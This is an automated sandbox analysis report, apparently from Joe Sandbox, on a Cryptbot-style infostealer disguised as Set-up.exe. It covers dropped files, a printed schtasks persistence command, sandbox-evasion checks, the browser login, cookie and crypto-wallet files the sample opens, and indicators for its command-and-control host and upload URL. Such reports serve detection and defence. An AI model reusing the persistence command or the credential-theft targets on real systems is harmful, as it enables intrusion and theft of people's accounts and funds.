Source: C:\Users\user\AppData\Local\Temp\service123.exe	Section loaded: nripudvfuuhzvedetrih.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Section loaded: nripudvfuuhzvedetrih.dll	Jump to behavior

Source: C:\Users\user\Desktop\Set-up.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32

Jump to behavior

Source: Set-up.exe

Static PE information: Virtual size of .text is bigger than: 0x100000

Source: Set-up.exe

Static file information: File size 10006016 > 1048576

Source: Set-up.exe	Static PE information: Raw size of .text is bigger than: 0x100000 < 0x2c7600
Source: Set-up.exe	Static PE information: Raw size of .data is bigger than: 0x100000 < 0x671400

Source: Set-up.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT

Source: C:\Users\user\AppData\Local\Temp\service123.exe

Code function: 5_2_00668230 LoadLibraryA,GetProcAddress,FreeLibrary,GetLastError,

5_2_00668230

Source: Set-up.exe	Static PE information: section name: .eh_fram
Source: service123.exe.0.dr	Static PE information: section name: .eh_fram
Source: NrIpUDVFuuHZveDEtrIh.dll.0.dr	Static PE information: section name: .eh_fram

Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_0066A499 push es; iretd	5_2_0066A694
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6C988C2A push edx; mov dword ptr [esp], ebx	5_2_6C988C3E
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6C9B4DB0 push eax; mov dword ptr [esp], ebx	5_2_6C9B5018
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6C994DC1 push eax; mov dword ptr [esp], ebx	5_2_6C994DD5
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6C986E03 push edx; mov dword ptr [esp], ebx	5_2_6C986E17
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6C994FA1 push eax; mov dword ptr [esp], ebx	5_2_6C994FB5
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6C99285C push edx; mov dword ptr [esp], ebx	5_2_6C992870
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6C9A8850 push eax; mov dword ptr [esp], ebx	5_2_6C9A8E4F
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6C990852 push eax; mov dword ptr [esp], ebx	5_2_6C990866
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6C9BE860 push eax; mov dword ptr [esp], ebx	5_2_6C9BE98B
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6C9C29A0 push eax; mov dword ptr [esp], ebx	5_2_6C9C2CD4
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6C9C29A0 push edx; mov dword ptr [esp], ebx	5_2_6C9C2CF3
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6C9F09E0 push eax; mov dword ptr [esp], edi	5_2_6C9F0B5A
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6C9BEAC0 push eax; mov dword ptr [esp], ebx	5_2_6C9BEBE3
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6C994BE1 push eax; mov dword ptr [esp], ebx	5_2_6C994BF5
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6C9804BE push eax; mov dword ptr [esp], ebx	5_2_6C98048A
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6C9804AD push eax; mov dword ptr [esp], ebx	5_2_6C98048A
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6C9864A3 push edx; mov dword ptr [esp], ebx	5_2_6C9864B7
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6C998451 push 890005EAh; ret	5_2_6C998459
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6C980452 push eax; mov dword ptr [esp], ebx	5_2_6C98048A
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6C9D0460 push eax; mov dword ptr [esp], ebx	5_2_6C9D07FF
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6C98A527 push eax; mov dword ptr [esp], ebx	5_2_6C98A53B
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6C961AAA push eax; mov dword ptr [esp], ebx	5_2_6CA16622
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6C961AAA push eax; mov dword ptr [esp], ebx	5_2_6CA16622
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6C98A6F7 push eax; mov dword ptr [esp], ebx	5_2_6C98A70B
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6C966098 push eax; mov dword ptr [esp], ebx	5_2_6CA16622
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6C9940D5 push ecx; mov dword ptr [esp], ebx	5_2_6C9940E9
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6C966003 push eax; mov dword ptr [esp], ebx	5_2_6CA16AF6
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6C966003 push edx; mov dword ptr [esp], edi	5_2_6CA16B36
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6C9881E5 push edx; mov dword ptr [esp], ebx	5_2_6C9881F9
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6C980290 push eax; mov dword ptr [esp], ebx	5_2_6C98048A

Source: C:\Users\user\Desktop\Set-up.exe	File created: C:\Users\user\AppData\Local\Temp\NrIpUDVFuuHZveDEtrIh.dll			Jump to dropped file
Source: C:\Users\user\Desktop\Set-up.exe	File created: C:\Users\user\AppData\Local\Temp\service123.exe			Jump to dropped file

Boot Survival

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Users\user\Desktop\Set-up.exe

Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\user\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f

Source: C:\Users\user\Desktop\Set-up.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior

Malware Analysis System Evasion

Found evasive API chain (may stop execution after checking mutex)

Source: C:\Users\user\AppData\Local\Temp\service123.exe

Evasive API call chain: CreateMutex,DecisionNodes,Sleep

graph_5-157985

Found stalling execution ending in API Sleep call

Source: C:\Users\user\AppData\Local\Temp\service123.exe

Stalling execution: Execution stalls by calling Sleep

graph_5-157986

Source: C:\Users\user\Desktop\Set-up.exe

Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\service123.exe

Window / User API: threadDelayed 809

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\service123.exe

API coverage: 1.1 %

Source: C:\Users\user\Desktop\Set-up.exe TID: 7764	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe TID: 8152	Thread sleep count: 809 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe TID: 8152	Thread sleep time: -80900s >= -30000s	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\service123.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\Desktop\desktop.ini	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\Documents\desktop.ini	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Temp	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user	Jump to behavior

Source: Set-up.exe, 00000000.00000003.1526374059.000000000D25B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696497155j
Source: Set-up.exe	Binary or memory string: VMware
Source: Set-up.exe, 00000000.00000003.1526374059.000000000D25B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696497155
Source: Set-up.exe, 00000000.00000003.1526374059.000000000D25B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696497155t
Source: Set-up.exe, 00000000.00000003.1526374059.000000000D25B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696497155
Source: Set-up.exe	Binary or memory string: navigatoradatwofactor.xlsbackupsOfficeXuanZhi9OriginmailGraphicsCachexrpWebStorageToastNotificationManagerCompatService WorkerejbalbakoplchlghecdalmeeeajnimhmLGHUBstremiotokencoinMetro\aholpfdialjgjfhomihkjbmgjidlcdnoVisual Studio SetupDropbox.jpgproductionMacromedia.txtLocal StorageCiscoSparkLauncherFACEITuser_dataUTC--2slobs-clientpkgsvcpkg.ElectrumpreferencesAutoHotkeyOlk\SlackEOS-Webcam-UtilitynavigationZWSOFTProcess Hacker 2avaxClickUpBlueStacks XReasonLabs\Blizzarduser_data#2carteira.IdentityService.jappsrvPicturesUXPWindows Server 2012 %wSwallet.datTerminalUpdateResourcenlbmnnijcnlegkjjpcfjclmcfggfefdmbilletera.pwdHotta\optimization_guide_prediction_model_downloadsPowerPointclaveswapiTop PDFSegmentation Platformthumbnailsdoge.pdfCaphyonWindows StoreEpsonSession StorageCanonbinanceViberdaidotContent-Type: multipart/form-data; boundary=----Boundary%lucom.adobe.dunamisUbisoftcodeDisc_Soft_FZE_LLCVodafoneElevatedDiagnosticscacheklnaejjgbibmhlephnhpmaofohgkpgkdBGAHelperLibCredentials.weasisUniSDKegjidjbpglichdcondbcbdnbeeppgdphPackages%d x %defbglgofoippbgcjepnhiblaibcnclgkAdguard_Software_Limited%.2f MB (%.2f GB)hdokiejnpimakedhajhdlcegeplioahdUserBenchmarkformhistory.sqliteFPSChessticketfactorIdentityCachedotnetsrcMotABBYY...Iq-TeamreposDocumentsVirtualBoxAuthcookies.sqlite.ipythonTikTok LIVE StudiointegrationsExodus\MessengerBlendCitraIntel(R)2FAEdgeUpdate360TotalSecurityFlash Playerbalena-etcherAdguard Software LimitedbhhhlbepdkbapadjdnnojkbgioiodbicUnrealEngineDropboxElectronCrashReportsAutoItGraineRealPlayerEpicGamesLauncher\.anacondaHoYoverse\ljfoeinjpaedjfecbmggjgodbgkmjkjkApkProjectsOneAuthConfigToolbarwindowParams.jsonmcohilncbfahbmgdjkbpemcciiolgcgeNetworklinkChaveshared_proto_dbPC HelpSoft Driver Updaterexodus.walletDownloaded InstallationsAMS SoftwarechainookjlbkiijinhpmnjffcofjonbfbgaocDiagnosticsMetaQuotesWindows Server 2012 R2 %wSuser_data#32 FAWindows Live ContactsNVIDIA Corporation\fhmfendgdocmcbmfikdcogofphimnknoAdobejaxSupportAshampoo.android.docbackuptrxApplicationInsightsLibraryWebTorrentarduino-ideGitKrakensidMPC-HCtbs_cache\microAppstronWinRARTerminal Server ClientTencentlogins.jsonAviraportefeuillehpglfhgfnhbgpjdenjgmdgoeiappaflndaoCanva.kdbcanva-updaterNotiondeemix MusicClassicShellkkpllkodjeloidieedojogacfhpaihohbhghoamapcdpbohphigoooaddinpkbaisecretdictionariesVMwarebtcLocal StoreGitHub DesktopPanasonicSidify Music ConverterMSOIdentityCRL.jpegusdblockNeteasehtxsentryFavoritesJDownloader 3.0XamarinTemplate.rtfJDownloader 2.0CorelCiscoSparkbitNotepad++SYACMPC-BERealNetworkswebview2uTorrentExcelAutodeskMegaDownloaderwebviewatomDriverPack NotifiercachesTesterAndroiddexEBWebView.condaMovavi Video ConvertergameAIMPSenhadmkamcknogkgcdfhhbddcghachkejeapMovaviAdaware.jdksPhotoScapeXPro.pngSilhouette AmericaupdatesClcriptReadyForindexWindows 7 %wSexchangeLogitechEADesktopPhotoWorksNeroPsiphon3StreamingVideoProviderVideoDecodeStatsBlackmagic DesigncjelfplplebdjjenllpjcblmjkfcffnePower BI Desktopapp.jsonOverwolfXuanZhikey4.dbUI
Source: Set-up.exe, 00000000.00000002.1992343702.000000000079E000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1484449204.00000000007F5000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.1992343702.00000000007F4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Set-up.exe, 00000000.00000003.1526374059.000000000D25B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696497155]
Source: Set-up.exe, 00000000.00000003.1526374059.000000000D25B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696497155\|UE
Source: Set-up.exe, 00000000.00000003.1526374059.000000000D25B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696497155o
Source: Set-up.exe, 00000000.00000003.1526374059.000000000D25B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696497155
Source: Set-up.exe, 00000000.00000003.1526374059.000000000D25B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696497155
Source: Set-up.exe, 00000000.00000003.1526374059.000000000D25B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696497155x
Source: Set-up.exe, 00000000.00000003.1526374059.000000000D25B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696497155
Source: Set-up.exe, 00000000.00000003.1526374059.000000000D25B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696497155h
Source: Set-up.exe, 00000000.00000003.1526374059.000000000D25B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696497155p
Source: Set-up.exe, 00000000.00000003.1526374059.000000000D25B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696497155n
Source: Set-up.exe, 00000000.00000003.1526374059.000000000D25B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696497155d
Source: Set-up.exe, 00000000.00000003.1526374059.000000000D25B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696497155x
Source: Set-up.exe, 00000000.00000003.1526374059.000000000D25B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696497155
Source: Set-up.exe, 00000000.00000003.1526374059.000000000D25B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696497155
Source: Set-up.exe, 00000000.00000003.1526374059.000000000D25B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696497155
Source: Set-up.exe, 00000000.00000003.1526374059.000000000D25B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696497155
Source: Set-up.exe, 00000000.00000003.1526374059.000000000D25B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696497155}
Source: Set-up.exe, 00000000.00000003.1526374059.000000000D25B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696497155^
Source: Set-up.exe, 00000000.00000003.1526374059.000000000D25B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696497155u
Source: Set-up.exe, 00000000.00000003.1484449204.00000000007F5000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.1992343702.00000000007F4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWGv
Source: Set-up.exe, 00000000.00000003.1526374059.000000000D25B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696497155f
Source: Set-up.exe, 00000000.00000003.1526374059.000000000D25B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696497155
Source: Set-up.exe, 00000000.00000003.1526374059.000000000D25B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696497155z
Source: Set-up.exe, 00000000.00000003.1526374059.000000000D25B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696497155t
Source: Set-up.exe, 00000000.00000003.1526374059.000000000D25B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696497155s
Source: Set-up.exe, 00000000.00000003.1526374059.000000000D25B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696497155}
Source: Set-up.exe, 00000000.00000003.1526374059.000000000D25B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696497155~
Source: Set-up.exe, 00000000.00000003.1526374059.000000000D25B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696497155x

Source: C:\Users\user\AppData\Local\Temp\service123.exe

Code function: 5_2_00668230 LoadLibraryA,GetProcAddress,FreeLibrary,GetLastError,

5_2_00668230

Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_0066116C Sleep,Sleep,SetUnhandledExceptionFilter,__p__acmdln,malloc,strlen,malloc,memcpy,__initenv,_amsg_exit,_initterm,GetStartupInfoA,_cexit,_initterm,exit,	5_2_0066116C
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_00661160 Sleep,SetUnhandledExceptionFilter,__p__acmdln,malloc,strlen,malloc,memcpy,__initenv,	5_2_00661160
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_006611A3 Sleep,SetUnhandledExceptionFilter,__p__acmdln,malloc,strlen,malloc,memcpy,__initenv,	5_2_006611A3
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_006613C9 SetUnhandledExceptionFilter,__p__acmdln,malloc,strlen,malloc,memcpy,__initenv,_amsg_exit,_initterm,	5_2_006613C9

Source: C:\Users\user\Desktop\Set-up.exe	Process created: C:\Users\user\AppData\Local\Temp\service123.exe "C:\Users\user\AppData\Local\Temp\service123.exe"			Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\user\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\service123.exe

Code function: 5_2_6C9C8280 cpuid

5_2_6C9C8280

Source: C:\Users\user\Desktop\Set-up.exe

Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0

Jump to behavior

Source: C:\Users\user\Desktop\Set-up.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: Set-up.exe, 00000000.00000002.1992343702.000000000080A000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: 123.exe

Stealing of Sensitive Information

Yara detected Clipboard Hijacker

Source: Yara match	File source: 5.2.service123.exe.6c940000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000003.1976708415.0000000003BDE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Set-up.exe PID: 7652, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: service123.exe PID: 8148, type: MEMORYSTR

Yara detected Cryptbot

Source: Yara match

File source: Process Memory Space: Set-up.exe PID: 7652, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: Set-up.exe	String found in binary or memory: Electrum
Source: Set-up.exe	String found in binary or memory: \ElectronCash\wallets
Source: Set-up.exe, 00000000.00000002.1993669524.000000000193B000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: .node-redOnDeviceHeadSuggestModel\Exodus\backupExodus backup\MultiBitHDMultiBit HD\Electrum\wallets\ElectronCash\walletsElectron Cash\Electrum-btcp\walletsElectrum BTCP\walletsUnknown Wallet (Folder - wallets)Android Open Source Project\Emulator\Movavi Video EditorVS Revo GroupSolidDocumentsSteamCachedData.vscodeCodeMEGAsyncISL Online CacheLogiShrdMega LimitedAVGBrowser.exeHP_Easy_StartmainXpomPowerISOPicWishHabbo LauncherSmartSteamEmukey3.dbsignons.sqliteTechSmithWildTangentWindows ServicesHP Active HealthNVIDIADigiartyuTorrent WebiCloudDriveJxBrowsertastytradewebcachePublishersSquirrelTempMedia Player@
Source: Set-up.exe	String found in binary or memory: \com.liberty.jaxx
Source: Set-up.exe	String found in binary or memory: \Exodus\backup
Source: Set-up.exe	String found in binary or memory: exodus
Source: Set-up.exe	String found in binary or memory: Ethereum (UTC)

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\key4.db	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\cookies.sqlite	Jump to behavior

Source: Yara match

File source: Process Memory Space: Set-up.exe PID: 7652, type: MEMORYSTR

Remote Access Functionality

Yara detected Cryptbot

Source: Yara match

File source: Process Memory Space: Set-up.exe PID: 7652, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Scheduled Task/Job	1 Scheduled Task/Job	11 Process Injection	1 Masquerading	1 OS Credential Dumping	21 Security Software Discovery	Remote Services	1 Archive Collected Data	2 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	11 Native API	1 DLL Side-Loading	1 Scheduled Task/Job	2 Virtualization/Sandbox Evasion	LSASS Memory	2 Virtualization/Sandbox Evasion	Remote Desktop Protocol	2 Data from Local System	2 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	11 Process Injection	Security Account Manager	1 Application Window Discovery	SMB/Windows Admin Shares	2 Clipboard Data	112 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Deobfuscate/Decode Files or Information	NTDS	2 File and Directory Discovery	Distributed Component Object Model	Input Capture	Protocol Impersonation	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	3 Obfuscated Files or Information	LSA Secrets	22 System Information Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	Wi-Fi Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label
https://ac.ecosia.org/autocomplete?q=	0%	URL Reputation	safe
https://duckduckgo.com/chrome_newtab	0%	URL Reputation	safe
https://gcc.gnu.org/bugs/):	0%	URL Reputation	safe
https://duckduckgo.com/ac/?q=	0%	URL Reputation	safe
analforeverlovyu.top	0%	URL Reputation	safe
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	0%	URL Reputation	safe
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	0%	URL Reputation	safe
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	0%	URL Reputation	safe
https://www.ecosia.org/newtab/	0%	URL Reputation	safe
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
elevenvx11pn.top	185.244.181.140	true	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
zx11pn.top	true		unknown
analforeverlovyu.top	true	URL Reputation: safe	unknown
\|Xl@elevenvx11pn.top	true		unknown
elevenvx11pn.top	true		unknown
~elevenvx11pn.top	true		unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://ac.ecosia.org/autocomplete?q=	Set-up.exe, 00000000.00000003.1525890260.0000000003340000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://duckduckgo.com/chrome_newtab	Set-up.exe, 00000000.00000003.1525890260.0000000003340000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://gcc.gnu.org/bugs/):	NrIpUDVFuuHZveDEtrIh.dll.0.dr	false	URL Reputation: safe	unknown
https://duckduckgo.com/ac/?q=	Set-up.exe, 00000000.00000003.1525890260.0000000003340000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	Set-up.exe, 00000000.00000003.1525890260.0000000003340000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://serviceupdate32.com/update	Set-up.exe	false		unknown
http://elevenvx11pn.top/v1/upload.php	Set-up.exe, 00000000.00000003.1484449204.00000000007DC000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	Set-up.exe, 00000000.00000003.1525890260.0000000003340000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	Set-up.exe, 00000000.00000003.1525890260.0000000003340000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	Set-up.exe, 00000000.00000003.1525890260.0000000003340000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.ecosia.org/newtab/	Set-up.exe, 00000000.00000003.1525890260.0000000003340000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	Set-up.exe, 00000000.00000003.1525890260.0000000003340000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
185.244.181.140	elevenvx11pn.top	Russian Federation		44901	BELCLOUDBG	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1523427
Start date and time:	2024-10-01 15:47:09 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 7m 6s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	11
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Set-up.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@8/2@1/1
EGA Information:	Successful, ratio: 50%
HCA Information:	Failed
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

